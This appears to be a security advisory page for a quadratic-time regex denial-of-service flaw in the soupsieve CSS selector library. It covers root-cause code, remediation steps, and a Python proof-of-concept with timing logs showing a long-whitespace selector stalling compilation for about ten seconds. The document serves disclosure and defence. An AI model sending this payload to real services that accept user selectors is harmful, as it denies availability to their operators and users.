Kestrel
대시보드로 돌아가기
CVE-2026-85999MEDIUM· 5.3MITRENVDGHSA대응게시일: 2026. 09. 17.수정일: 2026. 09. 17.

Soup Sieve: Polynomial-time ReDoS (O(n²)) in the whitespace/comment trimming regex `RE_WS_END` (triggers on VALID selectors)

DoS

위협 신호 · CVSS · EPSS · KEV

정기 패치· 높은 악용 신호 없음
CVSS
5.3medium

이론적 심각도 점수

EPSS

예측 데이터 없음

KEV
미등재

실측 악용 기록 없음

권장 대응 기한14일 이내CISA SSVC 기준

2주 이내 패치 — 우선 조치 대상

자동화 가능외부 노출· KEV 미등재 · 자동화 가능 · 부분 영향 · 외부 노출

CVSS 벡터 · 메트릭

악용 경로
공격 벡터네트워크
공격 복잡도낮음
필요 권한불필요
사용자 상호작용불필요
범위불변
영향
기밀성 영향없음
무결성 영향없음
가용성 영향낮음
버전별 점수
CVSS 3.15.3MODERATE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

상세 설명

Summary

Before tokenizing, selector_iter trims leading/trailing whitespace and comments by running two regexes over the whole raw selector with .search(). The trailing one, RE_WS_END = re.compile(r'{WSC}*$'), is anchored only at the end ($), not the start. Because .search() retries the pattern at every offset, a long run of whitespace or CSS comments that is not sitting exactly at the end of the string makes each retry greedily consume the run and then fail $, producing O(n²) time. This triggers on perfectly valid selectors — e.g. a descendant combinator with a long whitespace gap, a + " "*n + b — so no malformed input is required. A single valid ~20 KB selector stalls the interpreter for ~10 s of CPU.

Trust model (Q0)

The selector string is the input, reaching this code via soupsieve.compile(), the soupsieve.select/iselect/match/filter helpers, and BeautifulSoup's soup.select(selector) / soup.select_one(selector). Exploitable wherever an application passes a user-controlled CSS selector to BeautifulSoup/soupsieve. Applications using only hard-coded selectors are unaffected.

Root cause (exact anchors) — src/soupsieve/css_parser.py

bash
1# line 185-186
2RE_WS_BEGIN = re.compile(fr'^{WSC}*') # anchored at start -> .search() only tries pos 0 -> linear (safe)
3RE_WS_END = re.compile(fr'{WSC}*$') # NOT anchored at start -> .search() tries every offset
4
5# selector_iter, lines ~1322-1326
6m = RE_WS_BEGIN.search(pattern)
7index = m.end(0) if m else 0
8m = RE_WS_END.search(pattern) # <-- O(n^2) here
9end = (m.start(0) - 1) if m else (len(pattern) - 1)

WSC = (?:{WS}|{COMMENTS}). For RE_WS_END = (?:WS|COMMENTS)*$, .search() walks start offsets 0..n. Whenever the offset lands inside a long whitespace/comment run, (?:WS|COMMENTS)* greedily consumes to the run's end, then $ fails (a non-whitespace char follows), the engine backtracks the whole run, the offset advances by one, and the work repeats — O(n) offsets × O(n) per attempt = O(n²). RE_WS_BEGIN avoids this because ^ pins it to a single start offset.

The intent (trim trailing whitespace/comments) can be met with an anchored/loopless approach; the current unanchored .search() of a *$ pattern is the defect.

Reproduction environment (discipline #12 — published artifact)

  • git HEAD 751c57b (2.9, PYTHONPATH=src): cd src && python3 ../poc/poc_redos_ws_trim.py.
  • Published PyPI soupsieve 2.8.4 (fresh uv pip install soupsieve beautifulsoup4): cd poc && ../.venv-published/bin/python poc_redos_ws_trim.py → same O(n²) (evidence: poc/evidence_redos_ws_trim_PUBLISHED_2.8.4.log).
  • Python 3.11.15 and 3.14.6 both reproduce.

PoC (poc/poc_redos_ws_trim.py)

python
1import sys, time
2sys.path.insert(0, ".")
3import soupsieve as sv
4
5def ct(sel):
6 t0 = time.perf_counter()
7 try:
8 sv.compile(sel); st = "ok"
9 except Exception as e:
10 st = type(e).__name__
11 return time.perf_counter() - t0, st
12
13print(f"soupsieve {sv.__version__}\n")
14
15print("VALID selector 'a' + ' '*n + 'b' (descendant combinator, lots of whitespace):")
16for n in (2000, 4000, 8000, 16000):
17 dt, st = ct("a" + " " * n + "b")
18 print(f" n={n:<6} len={n+2:<7} {dt*1000:9.1f} ms [{st}]")
19
20payload = "a" + " " * 20000 + "b"
21dt, st = ct(payload)
22print(f"\n[+] Single call: compile('a' + ' '*20000 + 'b') (len={len(payload)})")
23print(f"[+] wall time = {dt:.2f} s [{st}]")

Isolated confirmation that the cost is in RE_WS_END.search specifically (poc/isolate_ws_trim.py): RE_WS_END on "div"+" "*n+">" is O(n²) (2000→100 ms, 4000→448 ms, 8000→1622 ms, 16000→6719 ms), while the start-anchored RE_WS_BEGIN on " "*n+"x" stays linear (32000→1.5 ms). Profiling compile shows the entire wall time in 2 re.Pattern.search calls, not .match.

Evidence — HEAD 2.9 (verbatim poc/evidence_redos_ws_trim.log)

text
1soupsieve 2.9
2
3VALID selector 'a' + ' '*n + 'b' (descendant combinator, lots of whitespace):
4 n=2000 len=2002 112.3 ms [ok]
5 n=4000 len=4002 411.5 ms [ok]
6 n=8000 len=8002 1602.9 ms [ok]
7 n=16000 len=16002 6464.1 ms [ok]
8
9VALID-looking 'a' + '/*x*/'*n + 'b' (CSS comment run):
10 n=1000 len=5002 48.9 ms [SelectorSyntaxError]
11 n=2000 len=10002 194.8 ms [SelectorSyntaxError]
12 n=4000 len=20002 780.2 ms [SelectorSyntaxError]
13 n=8000 len=40002 3145.3 ms [SelectorSyntaxError]
14
15[+] Single call: compile('a' + ' '*20000 + 'b') (len=20002)
16[+] wall time = 10.23 s [ok]

Evidence — published 2.8.4 (verbatim poc/evidence_redos_ws_trim_PUBLISHED_2.8.4.log)

text
1soupsieve 2.8.4
2
3VALID selector 'a' + ' '*n + 'b':
4 n=2000 len=2002 102.7 ms [ok]
5 n=4000 len=4002 404.3 ms [ok]
6 n=8000 len=8002 1618.2 ms [ok]
7 n=16000 len=16002 6457.9 ms [ok]
8[+] Single call: compile('a' + ' '*20000 + 'b') wall time = 10.11 s [ok]

Impact — calibrated

  • Confirmed: quadratic CPU per compile()/select() call on an attacker-controlled selector, triggered by a long internal whitespace or CSS-comment run. ~8 KB → ~1.6 s; ~20 KB → ~10 s; scaling ~×4 per input doubling. Notably fires on WELL-FORMED selectors, so it does not depend on a parser error path.
  • Realistic exposure: services that accept user-supplied CSS selectors and feed them to BeautifulSoup/soupsieve.
  • NOT claimed: exponential blowup, memory corruption, or code execution. Availability (DoS) only, and only where selectors are attacker-influenced.

Distinction from the IDENTIFIER/VALUE ReDoS

This is a separate root cause and a separate fix: the cost here is entirely in the RE_WS_END = {WSC}*$ trim step run with .search() before tokenizing (measured in re.Pattern.search), whereas the IDENTIFIER/VALUE issue is adjacent-quantifier backtracking during token .match(). They can be fixed independently.

Remediation

  • Anchor or de-loop the trailing-trim step: instead of .search() of {WSC}*$, scan trailing whitespace/comments from the end directly (e.g. reverse scan, or re.compile(r'^{WSC}*').match on a reversed-equivalent), so no per-offset retry occurs.
  • Alternatively strip whitespace/comments in a single forward tokenizing pass rather than with a pre-pass *$ search.
  • Defense-in-depth: cap selector length before compiling.

AI 심층 분석

공격 시나리오 · 재현 가능한 PoC 페이로드 · 즉시 적용 가능한 차단 패치를 한 번에 받아 보세요. 보안 운영팀이 그대로 점검·티켓팅에 쓸 수 있는 형태로 정리해 드립니다.